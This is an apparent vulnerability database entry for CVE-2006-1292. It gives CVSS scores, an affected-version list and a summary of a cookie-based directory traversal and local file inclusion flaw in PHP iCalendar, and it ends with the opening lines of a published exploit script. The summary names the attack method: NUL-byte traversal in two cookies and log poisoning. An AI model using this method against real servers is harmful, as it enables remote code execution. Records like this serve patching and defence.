5
CVSSv2

CVE-2006-1292

Published: 19/03/2006 Updated: 11/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and previous versions allows remote malicious users to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.

Vulnerable Product Search on Vulmon Subscribe to Product

php icalendar php icalendar 2.0

php icalendar php icalendar 2.0.1

php icalendar php icalendar 2.0a2

php icalendar php icalendar 2.0b

php icalendar php icalendar 2.0c

php icalendar php icalendar 2.1

php icalendar php icalendar

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "php iCalendar <=221 \"cookie_language\"/\"cookie_style\" remote cmmnds xctn\r\n"; echo "-> arbitrary local inclusion through cookies\r\n"; echo "by rgod rgod<AT>autistici<DOT>org\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; # short explaination: phpICal stores lang ...